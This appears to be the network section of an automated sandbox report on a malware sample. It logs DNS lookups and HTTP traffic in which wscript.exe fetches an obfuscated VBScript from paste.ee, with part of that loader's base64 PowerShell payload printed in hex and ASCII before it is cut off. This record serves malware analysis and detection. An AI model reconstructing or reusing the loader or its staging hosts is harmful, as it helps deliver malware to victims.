                                                                  Feb 13, 2024 21:13:55.092004061 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.092839003 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.092853069 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.092951059 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.092957020 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.093000889 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.093019962 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.093031883 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.093039036 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.093079090 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.093079090 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.093450069 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.093467951 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.093754053 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.093765020 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.093874931 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.094595909 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.094609976 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.094662905 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.094671965 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.095694065 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.095932961 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.095948935 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.095983982 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.096002102 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.096194983 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.096595049 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.096609116 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.096657038 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.096657038 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.096663952 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.096735954 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.096839905 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.096854925 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.096889973 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.096904993 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.097031116 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.098067045 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.098087072 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.098124027 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.098136902 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.098265886 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.098731995 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.098754883 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.098808050 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.098814011 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.098869085 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.099065065 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.099095106 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.099149942 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.099149942 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.099155903 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.099240065 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.100931883 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.100946903 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.101049900 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.101058960 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.101466894 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.102380991 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.102395058 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.102428913 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.102436066 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.102483988 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.103173971 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.103199959 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.103256941 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.103256941 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.103266001 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.103316069 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.103418112 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.103435040 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.103494883 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.103494883 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.103507996 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.103564978 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.104554892 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.104574919 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.104620934 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.104635954 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.104646921 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.104665995 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.104693890 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.104693890 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.104701042 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.104747057 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.104747057 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.105966091 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.105982065 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.106038094 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.106038094 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.106045008 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.106091022 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.106270075 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.106285095 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.106353045 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.106359005 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.106451035 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.107333899 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.107351065 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.107429028 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.107439041 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.107477903 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.107598066 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.107614994 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.107649088 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.107656002 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.107688904 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.107688904 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.108549118 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.108563900 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.108597040 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.108609915 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.108637094 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.108637094 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.108664036 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.108680964 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.108737946 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.108737946 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.108743906 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.108778000 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.110649109 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.110666037 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.110728025 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.110728025 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.110735893 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.110769987 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.110924006 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.110944033 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.111001015 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.111001015 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.111008883 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.111058950 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.111447096 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.111462116 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.111505032 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.111511946 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.111546993 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.111561060 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.111567020 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.111607075 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.111607075 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.111625910 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.111665010 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.111686945 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.111717939 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.112915993 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.112931013 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.112979889 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.112987041 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.113013029 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.113073111 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.113231897 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.113248110 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.113317966 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.113343954 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.113349915 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.113389015 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.113389015 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.113620996 CET44349701172.67.215.45192.168.2.6
                                                                  Feb 13, 2024 21:13:55.113663912 CET49701443192.168.2.6172.67.215.45
                                                                  Feb 13, 2024 21:13:55.117664099 CET49701443192.168.2.6172.67.215.45
                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Feb 13, 2024 21:13:49.673625946 CET6213453192.168.2.61.1.1.1
                                                                  Feb 13, 2024 21:13:49.792026997 CET53621341.1.1.1192.168.2.6
                                                                  Feb 13, 2024 21:13:53.285171986 CET5580753192.168.2.61.1.1.1
                                                                  Feb 13, 2024 21:13:53.591991901 CET53558071.1.1.1192.168.2.6
                                                                  Feb 13, 2024 21:13:58.944494963 CET6054253192.168.2.61.1.1.1
                                                                  Feb 13, 2024 21:13:59.265779018 CET53605421.1.1.1192.168.2.6
                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                  Feb 13, 2024 21:13:49.673625946 CET192.168.2.61.1.1.10xc69eStandard query (0)paste.eeA (IP address)IN (0x0001)false
                                                                  Feb 13, 2024 21:13:53.285171986 CET192.168.2.61.1.1.10x2324Standard query (0)uploaddeimagens.com.brA (IP address)IN (0x0001)false
                                                                  Feb 13, 2024 21:13:58.944494963 CET192.168.2.61.1.1.10xf00cStandard query (0)winderswonders.comA (IP address)IN (0x0001)false
                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                  Feb 13, 2024 21:13:49.792026997 CET1.1.1.1192.168.2.60xc69eNo error (0)paste.ee104.21.84.67A (IP address)IN (0x0001)false
                                                                  Feb 13, 2024 21:13:49.792026997 CET1.1.1.1192.168.2.60xc69eNo error (0)paste.ee172.67.187.200A (IP address)IN (0x0001)false
                                                                  Feb 13, 2024 21:13:53.591991901 CET1.1.1.1192.168.2.60x2324No error (0)uploaddeimagens.com.br172.67.215.45A (IP address)IN (0x0001)false
                                                                  Feb 13, 2024 21:13:53.591991901 CET1.1.1.1192.168.2.60x2324No error (0)uploaddeimagens.com.br104.21.45.138A (IP address)IN (0x0001)false
                                                                  Feb 13, 2024 21:13:59.265779018 CET1.1.1.1192.168.2.60xf00cServer failure (2)winderswonders.comnonenoneA (IP address)IN (0x0001)false
                                                                  • paste.ee
                                                                  • uploaddeimagens.com.br
                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  0192.168.2.649699104.21.84.67805612C:\Windows\System32\wscript.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Feb 13, 2024 21:13:49.917215109 CET149OUTGET /d/JZHbW HTTP/1.1
                                                                  Connection: Keep-Alive
                                                                  Accept: */*
                                                                  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                  Host: paste.ee
                                                                  Feb 13, 2024 21:13:50.108501911 CET792INHTTP/1.1 301 Moved Permanently
                                                                  Date: Tue, 13 Feb 2024 20:13:50 GMT
                                                                  Content-Type: text/html
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Location: https://paste.ee/d/JZHbW
                                                                  CF-Cache-Status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2FG0EyqUQ1eHEZL3u66%2F8%2BvcB1eg9%2BVEoIU1qBnKIIOCgnjRgpTc4hrupWUoFjpETYxujhGITa638TVAZyfv1rsT7xs521lKp8lso%2FN3tRUto4%2BqGC8KScwXxGA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 854fbbf34c3412ea-ATL
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  Data Raw: 61 62 0d 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                                                                  Data Ascii: ab<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
                                                                  Feb 13, 2024 21:13:50.108516932 CET5INData Raw: 30 0d 0a 0d 0a
                                                                  Data Ascii: 0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  0192.168.2.649700104.21.84.674435612C:\Windows\System32\wscript.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-02-13 20:13:50 UTC149OUTGET /d/JZHbW HTTP/1.1
                                                                  Connection: Keep-Alive
                                                                  Accept: */*
                                                                  User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                  Host: paste.ee
                                                                  2024-02-13 20:13:50 UTC1232INHTTP/1.1 200 OK
                                                                  Date: Tue, 13 Feb 2024 20:13:50 GMT
                                                                  Content-Type: text/plain; charset=utf-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Cache-Control: max-age=2592000
                                                                  strict-transport-security: max-age=63072000
                                                                  x-frame-options: DENY
                                                                  x-content-type-options: nosniff
                                                                  x-xss-protection: 1; mode=block
                                                                  content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none'
                                                                  CF-Cache-Status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=gu9NXnR1GRAd5UeI1rllQdiy6ietS9YelYsp2YaUyePB3mruxeo53gahoH8rvbZLQ9qK051VNRfg%2BKslvPFfbAkt0nZeST%2BZHH7BEKzZV8Vgb3NZBEz2q8ZYvg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 854fbbf71a944570-ATL
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  2024-02-13 20:13:50 UTC137INData Raw: 31 66 37 66 0d 0a 0d 0a 20 20 20 20 20 64 69 6d 20 64 65 73 6d 61 6e 69 6e 68 61 72 20 2c 20 6f 64 6f 6e 74 6f 67 65 6e 69 61 20 2c 20 61 67 6e 6f 73 69 61 20 2c 20 69 6e 66 65 63 74 6f 20 2c 20 7a 61 69 6d 6f 20 2c 20 43 61 6d 61 20 2c 20 7a 61 69 6d 6f 31 0d 0a 20 20 20 20 20 6f 64 6f 6e 74 6f 67 65 6e 69 61 20 3d 20 22 20 20 22 0d 0a 20 20 20 20 20 61 67 6e 6f 73 69 61 20 20 3d 20 22 22 20 26 20 69 6e 66
                                                                  Data Ascii: 1f7f dim desmaninhar , odontogenia , agnosia , infecto , zaimo , Cama , zaimo1 odontogenia = " " agnosia = "" & inf
                                                                  2024-02-13 20:13:50 UTC1369INData Raw: 65 63 74 6f 20 26 20 6f 64 6f 6e 74 6f 67 65 6e 69 61 20 26 20 69 6e 66 65 63 74 6f 20 26 20 22 67 42 31 44 67 54 72 65 47 34 44 67 54 72 65 59 77 42 30 44 67 54 72 65 47 6b 44 67 54 72 65 62 77 42 75 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 52 44 67 54 72 65 42 76 44 67 54 72 65 48 63 44 67 54 72 65 62 67 42 73 44 67 54 72 65 47 38 44 67 54 72 65 59 51 42 6b 44 67 54 72 65 45 51 44 67 54 72 65 59 51 42 30 44 67 54 72 65 47 45 44 67 54 72 65 52 67 42 79 44 67 54 72 65 47 38 44 67 54 72 65 62 51 42 4d 44 67 54 72 65 47 6b 44 67 54 72 65 62 67 42 72 44 67 54 72 65 48 4d 44 67 54 72 65 49 44 67 54 72 65 42 37 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 63 44 67 54 72 65 42 68 44 67 54 72 65 48 49 44 67 54 72 65 59 51 42 74 44 67 54 72 65 43 44 67
                                                                  Data Ascii: ecto & odontogenia & infecto & "gB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDg
                                                                  2024-02-13 20:13:50 UTC1369INData Raw: 65 37 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 22 20 26 20 69 6e 66 65 63 74 6f 20 26 20 6f 64 6f 6e 74 6f 67 65 6e 69 61 20 26 20 69 6e 66 65 63 74 6f 20 26 20 22 67 42 76 44 67 54 72 65 48 49 44 67 54 72 65 22 20 26 20 69 6e 66 65 63 74 6f 20 26 20 6f 64 6f 6e 74 6f 67 65 6e 69 61 20 26 20 69 6e 66 65 63 74 6f 20 26 20 22 51 42 68 44 67 54 72 65 47 4d 44 67 54 72 65 61 44 67 54 72 65 44 67 54 72 65 67 44 67 54 72 65 43 67 44 67 54 72 65 4a 44 67 54 72 65 42 73 44 67 54 72 65 47 6b 44 67 54 72 65 62 67 42 72 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 61 51 42 75 44 67 54 72 65 43 44 67 54 72 65 44 67 54 72 65 4a 44 67 54 72 65 42 7a 44 67 54 72 65 47 67 44 67 54 72 65 64 51 42 6d 44 67 54 72 65 47 59 44 67 54 72 65 62 44 67 54 72 65 42 6c 44
                                                                  Data Ascii: e7DgTreCDgTreDgTre" & infecto & odontogenia & infecto & "gBvDgTreHIDgTre" & infecto & odontogenia & infecto & "QBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlD
                                                                  2024-02-13 20:13:50 UTC1369INData Raw: 44 67 54 72 65 44 67 54 72 65 76 44 67 54 72 65 47 38 44 67 54 72 65 63 67 42 70 44 67 54 72 65 47 63 44 67 54 72 65 61 51 42 75 44 67 54 72 65 47 45 44 67 54 72 65 62 44 67 54 72 65 44 67 54 72 65 76 44 67 54 72 65 47 34 44 67 54 72 65 22 20 26 20 69 6e 66 65 63 74 6f 20 26 20 6f 64 6f 6e 74 6f 67 65 6e 69 61 20 26 20 69 6e 66 65 63 74 6f 20 26 20 22 51 42 33 44 67 54 72 65 46 38 44 67 54 72 65 61 51 42 74 44 67 54 72 65 47 45 44 67 54 72 65 22 20 26 20 69 6e 66 65 63 74 6f 20 26 20 6f 64 6f 6e 74 6f 67 65 6e 69 61 20 26 20 69 6e 66 65 63 74 6f 20 26 20 22 77 42 6c 44 67 54 72 65 43 34 44 67 54 72 65 61 67 42 77 44 67 54 72 65 47 63 44 67 54 72 65 50 77 44 67 54 72 65 78 44 67 54 72 65 44 63 44 67 54 72 65 4d 44 67 54 72 65 44 67 54 72 65 33 44 67 54 72
                                                                  Data Ascii: DgTreDgTrevDgTreG8DgTrecgBpDgTreGcDgTreaQBuDgTreGEDgTrebDgTreDgTrevDgTreG4DgTre" & infecto & odontogenia & infecto & "QB3DgTreF8DgTreaQBtDgTreGEDgTre" & infecto & odontogenia & infecto & "wBlDgTreC4DgTreagBwDgTreGcDgTrePwDgTrexDgTreDcDgTreMDgTreDgTre3DgTr
                                                                  2024-02-13 20:13:50 UTC1369INData Raw: 44 67 54 72 65 48 4d 44 67 54 72 65 64 44 67 54 72 65 42 6c 44 67 54 72 65 47 30 44 67 54 72 65 4c 67 42 55 44 67 54 72 65 47 55 44 67 54 72 65 65 44 67 54 72 65 42 30 44 67 54 72 65 43 34 44 67 54 72 65 52 51 42 75 44 67 54 72 65 47 4d 44 67 54 72 65 62 77 42 6b 44 67 54 72 65 47 6b 44 67 54 72 65 62 67 42 6e 44 67 54 72 65 46 30 44 67 54 72 65 4f 67 44 67 54 72 65 36 44 67 54 72 65 46 55 44 67 54 72 65 56 44 67 54 72 65 42 47 44 67 54 72 65 44 67 44 67 54 72 65 4c 67 42 48 44 67 54 72 65 47 55 44 67 54 72 65 64 44 67 54 72 65 42 54 44 67 54 72 65 48 51 44 67 54 72 65 63 67 42 70 44 67 54 72 65 47 34 44 67 54 72 65 22 20 26 20 69 6e 66 65 63 74 6f 20 26 20 6f 64 6f 6e 74 6f 67 65 6e 69 61 20 26 20 69 6e 66 65 63 74 6f 20 26 20 22 77 44 67 54 72 65 6f 44
                                                                  Data Ascii: DgTreHMDgTredDgTreBlDgTreG0DgTreLgBUDgTreGUDgTreeDgTreB0DgTreC4DgTreRQBuDgTreGMDgTrebwBkDgTreGkDgTrebgBnDgTreF0DgTreOgDgTre6DgTreFUDgTreVDgTreBGDgTreDgDgTreLgBHDgTreGUDgTredDgTreBTDgTreHQDgTrecgBpDgTreG4DgTre" & infecto & odontogenia & infecto & "wDgTreoD
                                                                  2024-02-13 20:13:50 UTC1369INData Raw: 65 22 20 26 20 69 6e 66 65 63 74 6f 20 26 20 6f 64 6f 6e 74 6f 67 65 6e 69 61 20 26 20 69 6e 66 65 63 74 6f 20 26 20 22 51 42 55 44 67 54 72 65 47 55 44 67 54 72 65 65 44 67 54 72 65 42 30 44 67 54 72 65 43 34 44 67 54 72 65 53 51 42 75 44 67 54 72 65 47 51 44 67 54 72 65 22 20 26 20 69 6e 66 65 63 74 6f 20 26 20 6f 64 6f 6e 74 6f 67 65 6e 69 61 20 26 20 69 6e 66 65 63 74 6f 20 26 20 22 51 42 34 44 67 54 72 65 45 38 44 67 54 72 65 22 20 26 20 69 6e 66 65 63 74 6f 20 26 20 6f 64 6f 6e 74 6f 67 65 6e 69 61 20 26 20 69 6e 66 65 63 74 6f 20 26 20 22 67 44 67 54 72 65 6f 44 67 54 72 65 43 51 44 67 54 72 65 22 20 26 20 69 6e 66 65 63 74 6f 20 26 20 6f 64 6f 6e 74 6f 67 65 6e 69 61 20 26 20 69 6e 66 65 63 74 6f 20 26 20 22 51 42 75 44 67 54 72 65 47 51 44 67 54
                                                                  Data Ascii: e" & infecto & odontogenia & infecto & "QBUDgTreGUDgTreeDgTreB0DgTreC4DgTreSQBuDgTreGQDgTre" & infecto & odontogenia & infecto & "QB4DgTreE8DgTre" & infecto & odontogenia & infecto & "gDgTreoDgTreCQDgTre" & infecto & odontogenia & infecto & "QBuDgTreGQDgT
